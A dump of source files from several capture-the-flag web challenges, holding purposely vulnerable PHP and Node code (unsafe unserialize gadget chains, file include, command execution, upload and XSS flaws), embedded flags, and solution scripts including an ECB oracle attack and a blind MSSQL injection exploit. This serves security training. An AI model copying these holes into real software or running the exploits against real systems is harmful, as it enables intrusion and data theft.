22 | 	blocks = [enc[i*32 : (i+1)*32] for i in range(len(enc) // 32)]
23 | 	return blocks
24 | 
25 | flag = ""
26 | for i in range(0, 14):
27 | 	for c in printable:
28 | 		name = "x" * (BLOCK_SIZE - len(flag) - 1) + flag + c + "x" * (BLOCK_SIZE - len(flag) - 1)
29 | 		setName(name)
30 | 		blocks = getBlocks()
31 | 		if blocks[0] == blocks[1]:
32 | 			flag += c
33 | 			print(flag)
34 | 			break
35 | 


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require_once 'config.php';
 4 | 
 5 | if ( isset($_SESSION['isAuth']) && ($_SESSION['isAuth'] === true) ) {
 6 |     die(header("Location: index.php"));
 7 | }
 8 | 
 9 | if ($_SERVER['REQUEST_METHOD'] === 'GET') {
10 |     require_once 'views/login.html';
11 |     die();
12 | } else if ($_SERVER['REQUEST_METHOD'] === 'POST') {
13 |     if ( empty($_POST['username']) || is_array($_POST['username']) ||
14 |          empty($_POST['quote']) || is_array($_POST['quote'])
15 |     ){
16 |         die("username and quote are required ! ");
17 |     }
18 | 
19 |     $_SESSION['username'] = $_POST['username'];
20 |     $_SESSION['quote'] = $_POST['quote'];
21 |     $_SESSION['color'] = "Red";
22 |     $_SESSION['isAuth'] = true;
23 | 
24 |     echo '
25 |         Login successfully ! Redirecting to index.php ...
26 |     <script>
27 |         setTimeout(() => {
28 |             window.location.href = "index.php";
29 |         }, 2000);
30 |     </script>';
31 | }   
32 | ?>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/bot.js:
--------------------------------------------------------------------------------
 1 | const puppeteer = require('puppeteer');
 2 | 
 3 | const browser_options = {
 4 | 	headless: true,
 5 | 	args: [
 6 | 		'--no-sandbox',
 7 | 		'--disable-background-networking',
 8 | 		'--disable-default-apps',
 9 | 		'--disable-extensions',
10 | 		'--disable-gpu',
11 | 		'--disable-sync',
12 | 		'--disable-translate',
13 | 		'--hide-scrollbars',
14 | 		'--metrics-recording-only',
15 | 		'--mute-audio',
16 | 		'--no-first-run',
17 | 		'--safebrowsing-disable-auto-update',
18 | 		'--js-flags=--noexpose_wasm,--jitless'
19 | 	]
20 | };
21 | 
22 | const visitPage = async url => {
23 | 	const browser = await puppeteer.launch(browser_options);
24 | 
25 | 	let context = await browser.createIncognitoBrowserContext();
26 | 	let page = await context.newPage();
27 | 
28 | 	await page.goto(url, {
29 | 		waitUntil: 'networkidle2'
30 | 	});
31 | 
32 | 	await page.waitForTimeout(7000);
33 | 	await browser.close();
34 | };
35 | 
36 | module.exports = { visitPage };


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/views/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 |   <meta
 5 |   http-equiv="Content-Security-Policy" content="
 6 |     default-src 'self'; connect-src 'self' https://*; 
 7 |     script-src 'unsafe-eval' 'self' https://www.gstatic.com/ https://www.google.com/ https://cdnjs.cloudflare.com/ajax/libs/dompurify/; 
 8 |     style-src 'self' 'unsafe-inline'; 
 9 |     frame-src https://www.google.com/ https://recaptcha.google.com/;
10 |   ">
11 |   <meta name="viewport" content="width=device-width, initial-scale=1">
12 |   <script src="https://www.google.com/recaptcha/api.js" async defer></script>
13 |   <link rel="stylesheet" href="css/style.css" crossorigin="anonymous">
14 |   <script src="js/app.js" async defer></script>
15 |   <title>XSS</title>
16 | </head>
17 | <body>
18 | 
19 | <div id="my_form">
20 |   <%- name %>
21 |   <h1>Your name?</h1>
22 |   <form method="GET" action="/">
23 |     <input type="text" name="name" />
24 |   </form>
25 | </div>
26 | 
27 | 
28 | </body>
29 | </html>


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/admin/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require '../config.php';
 3 | require '../classes/chain.php';
 4 | 
 5 | if (isset($_SESSION['user']) && $_SESSION['user'] === 'admin')  {
 6 | 	if (!isset($_COOKIE['data']))
 7 | 		setcookie('data', base64_encode(serialize(new Url("http://www.ahihi.com"))));
 8 | 	else {
 9 | 		$cookie = base64_decode($_COOKIE['data']);
10 | 		if (preg_match('/\x00/', $cookie))
11 | 			die('Hacker detected :))))');
12 | 		else
13 | 			unserialize($cookie);
14 | 	}
15 | }
16 | else {
17 | 	die('Login as admin!!!');
18 | }
19 | ?>
20 | <!DOCTYPE html>
21 | <html>
22 | <head>
23 | 	<meta charset="utf-8">
24 | 	<title>Admin area</title>
25 | </head>
26 | <body>
27 | 	<h1 style="text-align: center;">Admin area</h1>
28 | 	<h2 style="font-size: 32px">
29 | 		Good job hacker!! Giờ thì tìm flag thôi nàooooo!!<br>
30 | 	</h2>
31 | 	<p style="font-size: 24px">Lười code UI quá mong các bạn thông cảm :(((	</p>
32 | 	<p style="font-size: 10px;">Thật ra mình không giỏi code UI hihi!!</p>
33 | </body>
34 | </html>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require_once 'config.php';
 4 | require_once 'utils.php';
 5 | 
 6 | if ( !isset($_SESSION['isAuth']) ||  !( $_SESSION['isAuth'] === true) ) {
 7 |     die(header("Location: login.php"));
 8 | }
 9 | 
10 | if ($_SERVER['REQUEST_METHOD'] === 'GET') {
11 |     require_once 'views/profile.html';
12 |     die();
13 | } else if ($_SERVER['REQUEST_METHOD'] === 'POST') {
14 |     if ( empty($_POST['username']) || is_array($_POST['username']) ||
15 |          empty($_POST['quote']) || is_array($_POST['quote']) ||
16 |          empty($_POST['color']) || is_array($_POST['color'])
17 |     ){
18 |         die("username, quote and color are required ! ");
19 |     }
20 | 
21 |     $_SESSION['username'] = $_POST['username'];
22 |     $_SESSION['quote'] = $_POST['quote'];
23 |     $_SESSION['color'] = $_POST['color'];
24 | 
25 |     echo '
26 |         Update successfully ! Redirecting to index.php ...
27 |     <script>
28 |         setTimeout(() => {
29 |             window.location.href = "index.php";
30 |         }, 2000);
31 |     </script>';
32 | }   
33 | 
34 | 
35 | ?>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/utils.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require_once 'config.php';
 4 | 
 5 | class Color {
 6 |     public $str;
 7 |     public $color;
 8 | 
 9 |     public function __construct($str, $color) {
10 |         $this->str = $str;
11 |         $this->color = $color;
12 |     }
13 | 
14 |     public function __toString() {
15 |         return "<p><span style=\"color:$this->color;\">$this->str</span></p>";
16 | 
17 |     }
18 | }
19 | 
20 | 
21 | class Red extends Color {
22 |     public $str;
23 |     public $color;
24 | 
25 |     public function __construct($str) {
26 |         $this->str = $str;
27 |         $this->color = "red";
28 |     }
29 | }   
30 | 
31 | 
32 | class Green extends Color {
33 |     public $str;
34 |     public $color;
35 | 
36 |     public function __construct($str) {
37 |         $this->str = $str;
38 |         $this->color = "green";
39 |     }
40 | }   
41 | class Blue extends Color {
42 |     public $str;
43 |     public $color;
44 | 
45 |     public function __construct($str) {
46 |         $this->str = $str;
47 |         $this->color = "blue";
48 |     }
49 | }
50 | 
51 | 
52 | ?>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:current-buster-slim
 2 | 
 3 | # Install packages
 4 | RUN apt-get update \
 5 |     && apt-get install -y wget supervisor gnupg \
 6 |     && wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \
 7 |     && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \
 8 |     && apt-get update \
 9 |     && apt-get install -y google-chrome-stable fonts-ipafont-gothic fonts-wqy-zenhei fonts-thai-tlwg fonts-kacst fonts-freefont-ttf libxss1 \
10 |     --no-install-recommends \
11 |     && rm -rf /var/lib/apt/lists/*
12 |     
13 | # Setup app
14 | RUN mkdir -p /app
15 | 
16 | # Add application
17 | WORKDIR /app
18 | COPY challenge .
19 | 
20 | ENV FLAG=KCSC{R3g3x_1nJ3ct1on_t00_3z_t0_Expl0it}
21 | ENV SECRET=super_secret_key_you_cannot_guess_ahihi
22 | # Install dependencies
23 | RUN yarn
24 | 
25 | CMD ["npm", "install"]
26 | # Expose the port node-js is reachable on
27 | EXPOSE 80
28 | 
29 | # Start the node-js application
30 | CMD ["node", "index.js"]
31 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/bot.js:
--------------------------------------------------------------------------------
 1 | const puppeteer = require('puppeteer');
 2 | 
 3 | const browser_options = {
 4 | 	headless: true,
 5 | 	args: [
 6 | 		'--no-sandbox',
 7 | 		'--disable-background-networking',
 8 | 		'--disable-default-apps',
 9 | 		'--disable-extensions',
10 | 		'--disable-gpu',
11 | 		'--disable-sync',
12 | 		'--disable-translate',
13 | 		'--hide-scrollbars',
14 | 		'--metrics-recording-only',
15 | 		'--mute-audio',
16 | 		'--no-first-run',
17 | 		'--safebrowsing-disable-auto-update',
18 | 		'--js-flags=--noexpose_wasm,--jitless'
19 | 	]
20 | };
21 | 
22 | const visitPage = async url => {
23 | 	const browser = await puppeteer.launch(browser_options);
24 | 
25 | 	let context = await browser.createIncognitoBrowserContext();
26 | 	let page = await context.newPage();
27 | 	
28 | 	await page.setCookie({
29 | 		'name': 'Flag',
30 | 		'value': 'KMACTF{XSS_W1th_ReC4ptch4_4nd_d0m_cl0bb3r1ng}',
31 | 		'domain': '127.0.0.1'
32 | 	})
33 | 
34 | 	await page.goto(url, {
35 | 		waitUntil: 'networkidle2'
36 | 	});
37 | 
38 | 	await page.waitForTimeout(7000);
39 | 	await browser.close();
40 | };
41 | 
42 | module.exports = { visitPage };


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/classes/chain.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class File {
 4 | 	public $file;
 5 | 
 6 | 	public function __toString() {
 7 | 		if (!preg_match('/^(http|https|php|data|zip|input|phar|expect):\/\//', $this->file)) {
 8 | 			include($this->file);
 9 | 		}
10 | 		return "Ahihhii";
11 | 	}
12 | }
13 | 
14 | 
15 | class Url {
16 | 	public $url;
17 | 
18 | 	public function __construct($url) {
19 | 		$this->url = $url;
20 | 	}
21 | 
22 | 	public function checkUrl() {
23 | 		if (preg_match('/[http|https]:\/\//', $this->url))
24 | 			return true;
25 | 		else
26 | 			return false;
27 | 	} 
28 | }
29 | 
30 | 
31 | class Func1 {
32 | 	public $param1;
33 | 	public $param2;
34 | 
35 | 	public function __get($key) {
36 | 		$key = $this->param2;
37 | 		return $this->param1->$key();
38 | 	}
39 | }
40 | 
41 | class Source {
42 | 	private $source;
43 | 
44 | 	public function __construct($s) {
45 | 		$this->source = $s;
46 | 	}
47 | 	public function __invoke() {
48 | 		return $this->source->method;
49 | 	}
50 | }
51 | 
52 | 
53 | class Func2 {
54 | 	public $param;
55 | 
56 | 	public function __wakeup() {
57 | 		$function = $this->param;
58 | 		return $function();
59 | 	}
60 | }
61 | 
62 | ?>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/challenge/db/init.sql:
--------------------------------------------------------------------------------
 1 | CREATE DATABASE hackathon;
 2 | GO
 3 | 
 4 | USE hackathon;
 5 | 
 6 | CREATE TABLE admin (temp NVARCHAR(255) NULL);
 7 | 
 8 | CREATE TABLE flag ( flag VARCHAR(255) NOT NULL);
 9 | 
10 | INSERT INTO flag (flag) VALUES ('HDBH{pl4y_w1th_mSSql_s3rv3r_2984a9b27169ae95d8ab005bb2df5924}');
11 | 
12 | 
13 | CREATE TABLE notes (
14 |     note_id UNIQUEIDENTIFIER NOT NULL DEFAULT NEWID(),
15 |     title NVARCHAR(255) NOT NULL,
16 |     content NVARCHAR(MAX) NOT NULL,
17 |     created_by NVARCHAR(100) NOT NULL,
18 |     created_at DATETIME NOT NULL DEFAULT GETDATE(),
19 |     CONSTRAINT PK_notes PRIMARY KEY (note_id)
20 | );
21 | 
22 | INSERT INTO notes (title, content, created_by)
23 | VALUES 
24 | (N'Học SQL cơ bản', N'Ôn lại các câu lệnh CREATE, SELECT, INSERT, UPDATE, DELETE trong SQL Server.', N'Nguyễn Văn A'),
25 | 
26 | (N'Ý tưởng CTF Challenge', N'Thiết kế một challenge về SQL Injection để kiểm tra kỹ năng khai thác.', N'Trần Thị B'),
27 | 
28 | (N'Ghi chú học ExpressJS', N'Tìm hiểu cách tạo REST API bằng ExpressJS, kết nối với MSSQL.', N'Lê Văn C'),
29 | 
30 | (N'Ghi chú bảo mật', N'Xem lại cách ngăn chặn IDOR bằng cách filter theo userEmail.', N'Phạm Thị D'),
31 | 
32 | (N'Kế hoạch Hackathon 2025', N'Thiết lập MSSQL server, tạo database hackathon và chuẩn bị dataset.', N'Ngô Văn E');
33 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/pwn me/src/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | if ( isset($_GET["source"]) ) {
 4 | 	highlight_file(__FILE__);
 5 | 	die();
 6 | }
 7 | 
 8 | // Process file upload
 9 | if (isset($_FILES["file"])) {	
10 | 	// Clean storage
11 | 	$files = count(glob( "uploads/*"));
12 | 	if ($files > 100) {
13 | 		system("rm uploads/*");
14 | 	}
15 | 
16 | 	$fileExt = strtolower(pathinfo($_FILES["file"]["name"],PATHINFO_EXTENSION));
17 | 	
18 | 	if ( preg_match("/ph/i", $fileExt) )
19 | 		die("Don't cheat my fen");
20 | 
21 | 	$fileName = md5(rand(1, 1000000000)).".".$fileExt;
22 | 	$target_file = "uploads/" . $fileName;
23 | 	
24 | 	if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
25 | 		die("Your file: ".getcwd()."/".$target_file);
26 | 	} else {
27 | 		die("Something went wrong\n");
28 | 	}
29 | 
30 | }
31 | // Add enviroment variable
32 | if (isset($_GET["env"])) {
33 | 	foreach ($_GET["env"] as $key => $value) {
34 | 		if ( preg_match("/[A-Za-z_]/i", $key) && !preg_match("/bash/i", $key) )
35 | 			putenv($key."=".$value);
36 | 	}
37 | }
38 | 
39 | system("echo pwnme!!");
40 | 
41 | ?>
42 | 
43 | <form action="/" method="post" enctype="multipart/form-data">
44 |   Select evil file to upload:
45 |   <input type="file" name="file"> <br />
46 |   <input type="submit" value="Upload" name="submit">
47 | </form>
48 | 
49 | <!-- ?source=1 -->


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/utils.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class Utils {
 4 | 	public $a;
 5 | 	public $b;
 6 | 	public $baseDir;
 7 | 
 8 | 	function __construct() {
 9 | 		$this->baseDir = dirname(__FILE__);
10 | 	}
11 | 
12 | 	function uploadFile($file) {
13 | 		$msg = "";
14 | 		$is_ok = true;
15 | 
16 | 		$allowed = array('gif', 'png', 'jpg');
17 | 		$filename = $file['name'];
18 | 
19 | 		$ext = pathinfo($filename, PATHINFO_EXTENSION);
20 | 		if (!in_array($ext, $allowed)) {
21 | 		    $msg = 'Only allowed gif, png, jpg';
22 | 		    $is_ok = false;
23 | 		}
24 | 
25 | 		if ($file["size"] > 1000000) {
26 | 		  	$msg = "Sorry, your file is too large.";
27 | 		  	$is_ok = false;
28 | 		} 
29 | 
30 | 
31 | 		if ( !getimagesize($file['tmp_name']) ) {
32 | 			$msg = "Not a valid image";
33 | 			$is_ok = false;
34 | 		}
35 | 
36 | 		$file_name = bin2hex(random_bytes(10)).".jpg";
37 | 		$target_file = $this->baseDir."/uploads/".$file_name;
38 | 
39 | 		if (move_uploaded_file($file["tmp_name"], $target_file)) {
40 | 		    $msg =  "Your avatar stored at: ". $target_file;
41 | 		    $is_ok = true;
42 | 		} else {
43 | 		    $msg = "Sorry, there was an error uploading your file.";
44 | 		    $is_ok = false;
45 | 		}
46 | 
47 | 		return array($is_ok, $msg, $file_name);
48 | 	}
49 | 
50 | 	function __get($key) {
51 | 		return ($this->a)($this->b);
52 | 	}
53 | }
54 | 
55 | ?>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/challenge/database.js:
--------------------------------------------------------------------------------
 1 | const sqlite = require('sqlite-async');
 2 | 
 3 | class Database {
 4 |     constructor(db_file) {
 5 |         this.db_file = db_file;
 6 |         this.db = undefined;
 7 |     }
 8 |     
 9 |     async connect() {
10 |         this.db = await sqlite.open(this.db_file);
11 |     }
12 | 
13 |     async init() {
14 |         return this.db.exec(`
15 |             PRAGMA case_sensitive_like=ON; 
16 | 
17 |             DROP TABLE IF EXISTS users;
18 |             CREATE TABLE IF NOT EXISTS users (
19 |                 id          INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
20 |                 username    VARCHAR(255) NOT NULL,
21 |                 password    VARCHAR(255) NOT NULL
22 |             );
23 | 
24 |             DROP TABLE IF EXISTS notes;
25 |             CREATE TABLE IF NOT EXISTS notes (
26 |                 id          INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
27 |                 note        VARCHAR(255) NOT NULL,
28 |                 userId      INTEGER NOT NULL
29 |             );
30 | 
31 |             DROP TABLE IF EXISTS flag;
32 |             CREATE TABLE IF NOT EXISTS flag (
33 |                 flag    VARCHAR(255) NOT NULL
34 |             );
35 | 
36 |             INSERT INTO flag (flag) VALUES ('${process.env.FLAG || "KCSC{flag_for_testing}"}');
37 |         `);
38 |     }
39 | 
40 | }
41 | 
42 | module.exports = Database;


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/db/schema.sql:
--------------------------------------------------------------------------------
 1 | use kmactf;
 2 | drop table if EXISTS users;
 3 | create table users(id int PRIMARY key AUTO_INCREMENT, username varchar(255), password varchar(32), avatar varchar(255));
 4 | 
 5 | 
 6 | drop table if EXISTS shop;
 7 | create table shop(id int, name varchar(255), price int, url varchar(255));
 8 | insert into shop values(1, "Exodia" ,20000,"https://publish.one37pm.net/wp-content/uploads/2021/02/5-1.jpg?fit=600%2C875");
 9 | insert into shop values(2, "Dark Armed Dragon" ,30000,"https://publish.one37pm.net/wp-content/uploads/2021/02/3-1.jpg?fit=813%2C1185");
10 | insert into shop values(3, "Obelisk" ,40000,"https://publish.one37pm.net/wp-content/uploads/2021/02/7.png?fit=549%2C800");
11 | insert into shop values(4, "Slifer The Sky Dragon",50000,"https://publish.one37pm.net/wp-content/uploads/2021/02/8.jpg?fit=600%2C875");
12 | insert into shop values(5, "Super Quantal Mech King Great Magnus" ,60000,"https://publish.one37pm.net/wp-content/uploads/2021/02/super-quantal.jpg?fit=800%2C1167");
13 | insert into shop values(6, "The Winged Dragon Of Ra" ,70000,"https://publish.one37pm.net/wp-content/uploads/2021/02/10.jpg?fit=600%2C875");
14 | insert into shop values(7, "Victory Dragon" ,80000,"https://publish.one37pm.net/wp-content/uploads/2021/02/victory-dragon.jpg?fit=1096%2C1600");
15 | insert into shop values(8, "The Tyrant Neptune",9000,"https://publish.one37pm.net/wp-content/uploads/2021/02/9.jpg?fit=813%2C1185");


--------------------------------------------------------------------------------
/KCSC Recruit/EnCryptBoizzz/source/src/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | session_start();
 4 | @require_once 'config.php';
 5 | 
 6 | if (isset($_GET['debug'])) {
 7 | 	show_source(__FILE__);
 8 | 	die();
 9 | }
10 | 
11 | define('BLOCK_SIZE', 16);
12 | 
13 | function pad($string) {
14 | 	if (strlen($string) % BLOCK_SIZE === 0)
15 | 		$plaintext = $string;
16 | 	else  {
17 | 		$s = BLOCK_SIZE - strlen($string) % BLOCK_SIZE;
18 | 		$plaintext = $string.str_repeat(chr($s), $s);
19 | 	} 
20 | 	return $plaintext;
21 | }
22 | function encrypt($name) {
23 | 	global $auth_key, $key_for_enc; // from config.php with luv!!
24 | 
25 | 	$method = 'AES-128-ECB';
26 | 	$plaintext = pad($name.$auth_key);
27 | 	return bin2hex(openssl_encrypt($plaintext, $method, $key_for_enc, OPENSSL_RAW_DATA));
28 | }
29 | 
30 | if (isset($_GET["name"])) 
31 | 	$_SESSION["name"] = encrypt($_GET['name']);
32 | 
33 | if (isset($_GET['file'])) { // safe() in config.php, try to guess my filter =))
34 | 	if (safe($_GET['file'])) 
35 | 		@readfile($_GET['file']);
36 | 	else die("Dont hack me please =((((");
37 | }
38 | 
39 | if (isset($_GET['auth_key'])) {
40 | 	if ($_GET['auth_key'] === $auth_key) {
41 | 		if ( isset($_GET["command"]) && strlen($_GET["command"]) <= 5)
42 | 			@system($_GET["command"]);
43 | 	}
44 | 	else echo "Wrong auth_key!!";
45 | }
46 | 
47 | ?>
48 | 
49 | 
50 | <h1>Hello hacker ^>^ </h1>
51 | 
52 | <!-- 
53 | // TODO: Remove 
54 | 
55 | <strong>To debug, use ?debug=hint </strong>
56 | -->


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/routes/index.js:
--------------------------------------------------------------------------------
 1 | const bot             = require('../bot');
 2 | const path            = require('path');
 3 | const express         = require('express');
 4 | const router          = express.Router();
 5 | 
 6 | const response = data => ({ message: data });
 7 | const isAdmin = req => ((req.ip == '127.0.0.1') ? 1 : 0);
 8 | 
 9 | router.get('/', (req, res) => {
10 | 	let name = req.query.name;
11 | 
12 | 	if (!name) {
13 | 		name = ""
14 | 	}
15 | 	
16 | 	if (name.match(/<(script|svg|iframe)/i)) {
17 | 		name = "Don't hack"
18 | 	}
19 | 
20 | 	return res.render('index.html', {name: name});
21 | });
22 | 
23 | router.get('/report', (req, res) => {
24 | 	res.render('report.html');
25 | })
26 | 
27 | router.post('/report', (req, res) => {
28 | 	const { url } = req.body;
29 | 	if (url) {
30 | 		uregex = /https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&\/\/=]*)/
31 | 		if (url.match(uregex)) {
32 | 			return bot.visitPage(url)
33 | 				.then(() => res.send(response('Your submission is now pending review!')))
34 | 				.catch((e) => res.send(response('Something went wrong! Please try again!')))
35 | 				// .catch((e) => res.send(response(e)))
36 | 
37 | 		}
38 | 		return res.status(403).json(response('Please submit a valid URL!'));
39 | 	}
40 | 	return res.status(403).json(response('Missing required parameters!'));
41 | });
42 | 
43 | 
44 | module.exports = database => {
45 | 	return router;
46 | };


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require './classes/curl.php';
 4 | require './config.php';
 5 | 
 6 | $output = '';
 7 | 
 8 | if (isset($_POST['url'])) {
 9 | 	$curl = new CURL($_POST['url']);
10 | 	$curl->getData();
11 | 	$output = "Report successfully!!";
12 | }
13 | 
14 | ?>
15 | <!DOCTYPE html>
16 | <html>
17 | <head>
18 | 	<meta charset="utf-8">
19 | 	<title>Chưa biết đặt là gì :v</title>
20 | </head>
21 | <body>
22 | <div id="form">
23 | 
24 | 	<h1>Link report</h1>
25 | 	<h2><?php if($output) echo $output; ?></h2>
26 | 	<form action="/index.php" method="POST">
27 | 		<input type="text" name="url" />
28 | 		<input type="submit" name="submit" />
29 | 	</form>
30 | </div>
31 | 
32 | </body>
33 | </html>
34 | 
35 | <style type="text/css">
36 | 	body {
37 | 		background-image: url('./static/images/main_bg.png');
38 | 	}
39 | 
40 | 	#form {
41 | 		height: 15em;
42 | 		width: 50em;
43 | 		background-color: rgba(255, 255, 255, .8);
44 | 		position: relative;
45 | 		transform: translate(45%, 100%);
46 | 		border-radius: .5em;
47 | 	}
48 | 
49 | 	#form form {
50 | 		position: relative;
51 | 		transform: translate(15%, 100%);
52 | 	}
53 | 	
54 | 	#form form > input:first-child {
55 | 		border-radius: 0.2em;
56 | 		font-size: 1.5em;
57 | 		width: 20em;
58 | 		margin-top: 1em;
59 | 	}
60 | 	#form form > input:last-child {
61 | 		font-size: 1.5em;
62 | 		border-radius: .2em;
63 | 	}
64 | 
65 | 	#form h1 {
66 | 		font-size: 2.2em;
67 | 	}
68 | 
69 | 	#form h1, h2 {
70 | 		text-align: center;
71 | 	}
72 | </style>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/solution/exploit.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import string
 3 | 
 4 | session = requests.Session()
 5 | session.verify = False
 6 | 
 7 | url = "http://localhost:3000/search"
 8 | 
 9 | if __name__ == "__main__":
10 |     # Brute-force the password character by character
11 |     result = ""
12 |     #query = "select DB_NAME()" #-> hackathon
13 |     #query = "SELECT name FROM hackathon..sysobjects WHERE xtype=0x55 ORDER BY name OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY"
14 |     #query = "SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = CAST(0x666c6167 AS VARCHAR(4)) )" # flag
15 |     query = "SELECT flag from flag" # flag
16 |     index = 1
17 |     charset = string.ascii_letters + string.digits + string.punctuation
18 |     while True:
19 |         found_char = False
20 |         for char in charset:
21 |             print(f"Trying character: {char} at position {index}")
22 |             payload = f"(select 1 where 1=(select iif(ascii(substring(({query}),{index},1))={ord(char)}, 3, @@version)))"
23 |             data = {
24 |                 "search": "test",
25 |                 "created_by": "",
26 |                 "order_by": payload
27 |             }
28 |             response = session.post(url, data=data)
29 |             if response.status_code == 200:
30 |                 result += char
31 |                 print(f"Found character: {char}, Current result: {result}")
32 |                 found_char = True
33 |                 index += 1
34 |                 break
35 |         if not found_char:
36 |             print("Final result:", result)
37 |             print("Data extraction complete.")
38 |             break   
39 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/static/css/profile.css:
--------------------------------------------------------------------------------
 1 | body{
 2 |     background:#eee;
 3 | }
 4 | 
 5 | .card{
 6 |     border:none;
 7 | 
 8 |     position:relative;
 9 |     overflow:hidden;
10 |     border-radius:8px;
11 |     cursor:pointer;
12 | }
13 | 
14 | .card:before{
15 |     
16 |     content:"";
17 |     position:absolute;
18 |     left:0;
19 |     top:0;
20 |     width:4px;
21 |     height:100%;
22 |     background-color:#E1BEE7;
23 |     transform:scaleY(1);
24 |     transition:all 0.5s;
25 |     transform-origin: bottom
26 | }
27 | 
28 | .card:after{
29 |     
30 |     content:"";
31 |     position:absolute;
32 |     left:0;
33 |     top:0;
34 |     width:4px;
35 |     height:100%;
36 |     background-color:#8E24AA;
37 |     transform:scaleY(0);
38 |     transition:all 0.5s;
39 |     transform-origin: bottom
40 | }
41 | 
42 | .card:hover::after{
43 |     transform:scaleY(1);
44 | }
45 | 
46 | 
47 | .fonts{
48 |     font-size:11px;
49 | }
50 | 
51 | .social-list{
52 |     display:flex;
53 |     list-style:none;
54 |     justify-content:center;
55 |     padding:0;
56 | }
57 | 
58 | .social-list li{
59 |     padding:10px;
60 |     color:#8E24AA;
61 |     font-size:19px;
62 | }
63 | 
64 | 
65 | .buttons button:nth-child(1){
66 |        border:1px solid #8E24AA !important;
67 |        color:#8E24AA;
68 |        height:40px;
69 | }
70 | 
71 | .buttons button:nth-child(1):hover{
72 |        border:1px solid #8E24AA !important;
73 |        color:#fff;
74 |        height:40px;
75 |        background-color:#8E24AA;
76 | }
77 | 
78 | .buttons button:nth-child(2){
79 |        border:1px solid #8E24AA !important;
80 |        background-color:#8E24AA;
81 |        color:#fff;
82 |         height:40px;
83 | }


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require './config.php';
 3 | $output = '';
 4 | if (isset($_POST['username']) &&  isset($_POST['password'])) {
 5 | 	$username = $_POST['username'];
 6 | 	$password = $_POST['password'];
 7 | 
 8 | 	$stmt = $conn->prepare('SELECT * FROM users WHERE username=? and password=? limit 0,1');
 9 | 	$stmt->bind_param("ss", $username, $password);
10 | 	$stmt->execute();
11 | 	$result = $stmt->get_result();
12 | 
13 | 	if ($user = $result->fetch_assoc()['username']) {
14 | 		$_SESSION['user'] = 'admin';
15 | 		header('Location: /admin');
16 | 	}
17 | 	else
18 | 		$output = "Try again!!";
19 | 
20 | 	$stmt->close();
21 | }
22 | ?>
23 | 
24 | <!DOCTYPE html>
25 | <html>
26 | <head>
27 | 	<meta charset="utf-8">
28 | 	<title></title>
29 | </head>
30 | <body>
31 | 	<div id="login">
32 | 		<h1>Login form</h1>
33 | 		<h2><?php if($output) echo $output; ?></h2>
34 | 		<form action="/login.php" method="POST">
35 | 			<input type="text" name="username" /> 
36 | 			<input type="password" name="password" />
37 | 			<input type="submit" name="Submit" value="Submit" />
38 | 		</form>
39 | 	</div>
40 | </body>
41 | </html>
42 | 
43 | <style type="text/css">
44 | 	body {
45 | 		background-image: url('./static/images/login.jpg');
46 | 	}
47 | 	#login {
48 | 		width: 40em;
49 | 		height: 18em;
50 | 		border-radius: .8em;
51 | 		border: 1px solid black;
52 | 		position: relative;
53 | 		background-color: rgba(255, 255, 255, 0.8);
54 | 		transform: translate(60%, 60%);
55 | 		padding-left: 2em;
56 | 	}
57 | 
58 | 	#form > form {
59 | 		position: relative;
60 | 		transform: translate(15%, 100%);
61 | 	}
62 | 
63 | 	#login form > input {
64 | 		display: block;
65 | 		font-size: 1.5em;
66 | 		margin-top: 0.5em;
67 | 	}
68 | </style>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/views/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="vi">
 3 | <head>
 4 |   <meta charset="UTF-8">
